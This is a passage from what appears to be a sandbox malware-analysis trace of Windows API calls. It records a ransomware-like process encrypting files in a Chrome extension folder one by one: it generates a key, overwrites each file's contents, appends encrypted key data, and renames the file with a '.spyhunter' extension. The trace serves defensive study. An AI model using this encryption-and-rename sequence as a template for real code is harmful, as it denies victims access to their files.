data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0133.811] GetProcessHeap () returned 0x2c0000 [0133.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.811] GetProcessHeap () returned 0x2c0000 [0133.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.811] GetProcessHeap () returned 0x2c0000 [0133.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31dfd0 | out: hHeap=0x2c0000) returned 1 [0133.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf580 | out: pbBuffer=0x25cf580) returned 1 [0133.811] GetProcessHeap () returned 0x2c0000 [0133.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf578*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf578*=0x30) returned 1 [0133.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0133.814] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0133.814] GetProcessHeap () returned 0x2c0000 [0133.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.814] ReadFile (in: hFile=0x188, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf53c*=0x5f, lpOverlapped=0x0) returned 1 [0133.815] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.815] WriteFile (in: hFile=0x188, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf53c*=0x5f, lpOverlapped=0x0) returned 1 [0133.815] GetProcessHeap () returned 0x2c0000 [0133.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.815] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.815] WriteFile (in: hFile=0x188, lpBuffer=0x25cf57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x25cf57c*, lpNumberOfBytesWritten=0x25cf53c*=0x4, lpOverlapped=0x0) returned 1 [0133.816] WriteFile (in: hFile=0x188, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf53c*=0x30, lpOverlapped=0x0) returned 1 [0133.816] CloseHandle (hObject=0x188) returned 1 [0133.816] GetProcessHeap () returned 0x2c0000 [0133.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.816] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.spyhunter") returned 147 [0133.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.spyhunter")) returned 1 [0133.817] GetProcessHeap () returned 0x2c0000 [0133.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.817] GetProcessHeap () returned 0x2c0000 [0133.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.817] GetProcessHeap () returned 0x2c0000 [0133.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18038 | out: hHeap=0x2c0000) returned 1 [0133.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf580 | out: pbBuffer=0x25cf580) returned 1 [0133.817] GetProcessHeap () returned 0x2c0000 [0133.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf578*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf578*=0x30) returned 1 [0133.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0133.819] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0133.819] GetProcessHeap () returned 0x2c0000 [0133.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0133.819] ReadFile (in: hFile=0x188, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf53c*=0x5c, lpOverlapped=0x0) returned 1 [0133.820] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.820] WriteFile (in: hFile=0x188, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf53c*=0x5c, lpOverlapped=0x0) returned 1 [0133.820] GetProcessHeap () returned 0x2c0000 [0133.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0133.820] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.820] WriteFile (in: hFile=0x188, lpBuffer=0x25cf57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x25cf57c*, lpNumberOfBytesWritten=0x25cf53c*=0x4, lpOverlapped=0x0) returned 1 [0133.820] WriteFile (in: hFile=0x188, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf53c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf53c*=0x30, lpOverlapped=0x0) returned 1 [0133.821] CloseHandle (hObject=0x188) returned 1 [0133.821] GetProcessHeap () returned 0x2c0000 [0133.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.821] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.spyhunter") returned 149 [0133.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.spyhunter")) returned 1 [0133.822] GetProcessHeap () returned 0x2c0000 [0133.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.822] GetProcessHeap () returned 0x2c0000 [0133.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.822] GetProcessHeap () returned 0x2c0000 [0133.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17ed8 | out: hHeap=0x2c0000) returned 1 [0133.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf578 | out: pbBuffer=0x25cf578) returned 1 [0133.822] GetProcessHeap () returned 0x2c0000 [0133.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf570*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf570*=0x30) returned 1 [0133.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.833] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0133.833] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0133.833] GetProcessHeap () returned 0x2c0000 [0133.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.833] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf534*=0xa0, lpOverlapped=0x0) returned 1 [0133.834] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.835] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x25cf534, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf534*=0xa0, lpOverlapped=0x0) returned 1 [0133.835] GetProcessHeap () returned 0x2c0000 [0133.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.835] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.835] WriteFile (in: hFile=0x180, lpBuffer=0x25cf574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf534, lpOverlapped=0x0 | out: lpBuffer=0x25cf574*, lpNumberOfBytesWritten=0x25cf534*=0x4, lpOverlapped=0x0) returned 1 [0133.835] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf534, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf534*=0x30, lpOverlapped=0x0) returned 1 [0133.835] CloseHandle (hObject=0x180) returned 1 [0133.835] GetProcessHeap () returned 0x2c0000 [0133.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.835] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.spyhunter") returned 151 [0133.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.spyhunter")) returned 1 [0133.836] GetProcessHeap () returned 0x2c0000 [0133.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.836] GetProcessHeap () returned 0x2c0000 [0133.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.836] GetProcessHeap () returned 0x2c0000 [0133.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0133.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf570 | out: pbBuffer=0x25cf570) returned 1 [0133.838] GetProcessHeap () returned 0x2c0000 [0133.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf568*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf568*=0x30) returned 1 [0133.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.838] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0133.838] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.838] GetProcessHeap () returned 0x2c0000 [0133.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.839] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf52c*=0xdd, lpOverlapped=0x0) returned 1 [0133.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.840] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x25cf52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf52c*=0xdd, lpOverlapped=0x0) returned 1 [0133.840] GetProcessHeap () returned 0x2c0000 [0133.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.840] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.840] WriteFile (in: hFile=0x180, lpBuffer=0x25cf56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf52c, lpOverlapped=0x0 | out: lpBuffer=0x25cf56c*, lpNumberOfBytesWritten=0x25cf52c*=0x4, lpOverlapped=0x0) returned 1 [0133.840] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf52c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf52c*=0x30, lpOverlapped=0x0) returned 1 [0133.840] CloseHandle (hObject=0x180) returned 1 [0133.841] GetProcessHeap () returned 0x2c0000 [0133.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.841] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.spyhunter") returned 169 [0133.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.spyhunter")) returned 1 [0133.841] GetProcessHeap () returned 0x2c0000 [0133.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.841] GetProcessHeap () returned 0x2c0000 [0133.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.841] GetProcessHeap () returned 0x2c0000 [0133.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cef9d8 | out: hHeap=0x2c0000) returned 1 [0133.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf568 | out: pbBuffer=0x25cf568) returned 1 [0133.843] GetProcessHeap () returned 0x2c0000 [0133.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf560*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf560*=0x30) returned 1 [0133.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0133.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0133.843] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.843] GetProcessHeap () returned 0x2c0000 [0133.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.843] ReadFile (in: hFile=0x180, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf524*=0xdf, lpOverlapped=0x0) returned 1 [0133.844] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.844] WriteFile (in: hFile=0x180, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x25cf524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf524*=0xdf, lpOverlapped=0x0) returned 1 [0133.844] GetProcessHeap () returned 0x2c0000 [0133.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.845] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.845] WriteFile (in: hFile=0x180, lpBuffer=0x25cf564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf524, lpOverlapped=0x0 | out: lpBuffer=0x25cf564*, lpNumberOfBytesWritten=0x25cf524*=0x4, lpOverlapped=0x0) returned 1 [0133.845] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf524, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf524*=0x30, lpOverlapped=0x0) returned 1 [0133.845] CloseHandle (hObject=0x180) returned 1 [0133.845] GetProcessHeap () returned 0x2c0000 [0133.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.845] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.spyhunter") returned 165 [0133.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0133.846] GetProcessHeap () returned 0x2c0000 [0133.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.846] GetProcessHeap () returned 0x2c0000 [0133.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.846] GetProcessHeap () returned 0x2c0000 [0133.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e620 | out: hHeap=0x2c0000) returned 1 [0133.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf560 | out: pbBuffer=0x25cf560) returned 1 [0133.847] GetProcessHeap () returned 0x2c0000 [0133.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf558*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf558*=0x30) returned 1 [0133.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 